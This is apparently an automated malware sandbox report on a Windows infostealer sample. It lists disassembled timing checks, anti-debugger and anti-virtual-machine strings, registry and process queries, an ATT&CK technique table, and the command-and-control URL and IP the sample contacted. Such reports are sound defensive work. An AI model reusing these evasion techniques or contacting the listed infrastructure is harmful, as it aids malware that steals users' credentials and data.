Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280DF6 second address: 7280E06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F10C481811Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E06 second address: 7280E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E1F second address: 7280E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 95C4h 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E28 second address: 7280E3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816DFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E3D second address: 7280E41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E41 second address: 7280E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E47 second address: 7280E71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F10C481811Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E71 second address: 7280E86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E86 second address: 7280E8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280E8C second address: 7280EA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F10C4816E02h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280EA9 second address: 7280EAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280EAF second address: 7280EB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280F38 second address: 7280F47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280F47 second address: 7280F91 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4816E09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c mov esi, 5731DA73h 0x00000011 mov si, AACFh 0x00000015 popad 0x00000016 mov dword ptr [esi+0Ch], eax 0x00000019 jmp 00007F10C4816E02h 0x0000001e mov edx, 772406ECh 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280F91 second address: 7280F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280F95 second address: 7280F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280F9B second address: 7280FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818124h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F10C481811Ah 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7280FC6 second address: 7281019 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, ecx 0x00000005 mov al, 41h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a lock cmpxchg dword ptr [edx], ecx 0x0000000e jmp 00007F10C4816E01h 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F10C4816DFFh 0x0000001d sub ax, E4AEh 0x00000022 jmp 00007F10C4816E09h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7281019 second address: 728103F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C4818121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F10C481811Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728103F second address: 7281078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 1A54C322h 0x00000008 mov esi, ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jne 00007F1134755486h 0x00000013 pushad 0x00000014 call 00007F10C4816DFBh 0x00000019 mov cx, 30FFh 0x0000001d pop esi 0x0000001e mov ebx, 48A5FBB8h 0x00000023 popad 0x00000024 mov edx, dword ptr [ebp+08h] 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F10C4816DFAh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7281078 second address: 728107E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728107E second address: 7281082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7281082 second address: 7281086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7281086 second address: 72810D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi] 0x0000000a pushad 0x0000000b jmp 00007F10C4816DFFh 0x00000010 mov ax, 79CFh 0x00000014 popad 0x00000015 mov dword ptr [edx], eax 0x00000017 pushad 0x00000018 mov ch, D3h 0x0000001a pushfd 0x0000001b jmp 00007F10C4816DFDh 0x00000020 xor ch, FFFFFFB6h 0x00000023 jmp 00007F10C4816E01h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+04h] 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72810D7 second address: 72810EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F10C481811Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72810EA second address: 72810F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 72810F0 second address: 7281129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b jmp 00007F10C4818127h 0x00000010 mov eax, dword ptr [esi+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F10C4818120h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 7281129 second address: 728112D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRDTSC instruction interceptor: First address: 728112D second address: 7281133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSpecial instruction interceptor: First address: 1471978 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSpecial instruction interceptor: First address: 169ED7D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00F79980 rdtsc 0_2_00F79980
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D929FF
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00D9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D9255D
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 5KwhHEdmM4.exeBinary or memory string: Hyper-V RAW
Source: 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 5KwhHEdmM4.exe, 00000000.00000003.1396390442.0000000001C56000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396459434.0000000001C67000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1396977659.0000000001C6A000.00000004.00000020.00020000.00000000.sdmp, 5KwhHEdmM4.exe, 00000000.00000002.1415202643.0000000001C6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll+Mr1VBa306OLwt4fiuEbkfabhdV13XNOmA7W3g2\/VTwY26fnvEHibwXkEq1DG5xTxOOoVJ0qmX5ZF4\/F069JuNTD1\/YXw2Drws+enjsRhpRtZ+9KKf6bwz4P+IHFVPD4rA5DWweXYmnTr0c0ziUcrwVXDVoxlSxWGWJti8fhqqlF062XYXGQmryTcYTcfksf8tPx\/rUdforY\/Br4QeJtFUXPgiXw\/M8jMNR8JeKfEsGoIwI2xlfFuoeM9LktuD5kf9lx3LgkJewna6+X+I\/2R78+ZN4A8caNrnEjR6J4tgHgvWZXJ3R29pqMl1qvhGZETKPf6x4i8NCSRQy2UaybI\/MyTxk4KzRqGIr4\/I5Ta9n\/bWFhSoyXWc8Xga+YYLDQSs3PGYnDq2uvLLl97PvALxCyWMp4bD5bxHCmr1f8AV\/GVK1eL+zCngczwuV5h
Source: 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile opened: NTICE
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile opened: SICE
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeCode function: 0_2_00F79980 rdtsc 0_2_00F79980
Source: 5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1414076607.00000000015F6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\5KwhHEdmM4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: procmon.exe
Source: 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.7:49701 -> 5.101.3.217:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
5KwhHEdmM4.exe47%ReversingLabsWin32.Trojan.Generic
5KwhHEdmM4.exe100%AviraTR/Crypt.TPM.Gen
5KwhHEdmM4.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0000%Avira URL Cloudsafe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a10%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fiveth5ht.top
5.101.3.217
truefalse
    		high
    httpbin.org
    		34.226.108.155
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0false
        		high
        http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.html5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
              		high
              http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF175KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                		high
                http://html4/loose.dtd5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                  		high
                  https://curl.se/docs/alt-svc.html#5KwhHEdmM4.exefalse
                    		high
                    http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a15KwhHEdmM4.exe, 00000000.00000003.1397048941.0000000001BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://httpbin.org/ipbefore5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://curl.se/docs/http-cookies.html5KwhHEdmM4.exe, 5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                        		high
                        https://curl.se/docs/hsts.html#5KwhHEdmM4.exefalse
                          		high
                          http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0005KwhHEdmM4.exe, 00000000.00000002.1414762865.0000000001BCE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://curl.se/docs/http-cookies.html#5KwhHEdmM4.exefalse
                              		high
                              https://curl.se/docs/alt-svc.html5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                http://.css5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                  		high
                                  http://.jpg5KwhHEdmM4.exe, 00000000.00000002.1413108358.0000000001301000.00000040.00000001.01000000.00000003.sdmp, 5KwhHEdmM4.exe, 00000000.00000003.1260122113.00000000074F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                    		high

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    34.226.108.155
                                    		httpbin.orgUnited States
                                    		14618AMAZON-AESUSfalse
                                    5.101.3.217
                                    		home.fiveth5ht.topRussian Federation
                                    		34665PINDC-ASRUfalse

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581405
                                    Start date and time:2024-12-27 15:04:53 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 10s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:5KwhHEdmM4.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:0c9fc2b51c7c604fd0bd9789f344cb95.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@8/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: 5KwhHEdmM4.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    34.226.108.155dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                      OAKPYEH4c6.exeGet hashmaliciousLummaCBrowse
                                        ZTM2pfyhu3.exeGet hashmaliciousLummaCBrowse
                                          BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                            5uVReRlvME.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Remcos, StealcBrowse
                                              3stIhG821a.exeGet hashmaliciousLummaCBrowse
                                                4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                  8wiUGtm9UM.exeGet hashmaliciousLummaCBrowse
                                                    mBr65h6L4w.exeGet hashmaliciousUnknownBrowse
                                                      HrIrtCXI3s.exeGet hashmaliciousUnknownBrowse
                                                        5.101.3.217dZsdMl5Pwl.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        BkB1ur7aFW.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        OoYYtngD7d.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        NWJ4JvzFcs.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        EwhnoHx0n5.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        PqHnYMj5eF.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        qZA8AyGxiA.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        4o4t8dO4r1.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        xXe4fTmV2h.exeGet hashmaliciousUnknownBrowse
                                                        • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                                        lolvgcpX19.exeGet hashmaliciousUnknownBrowse
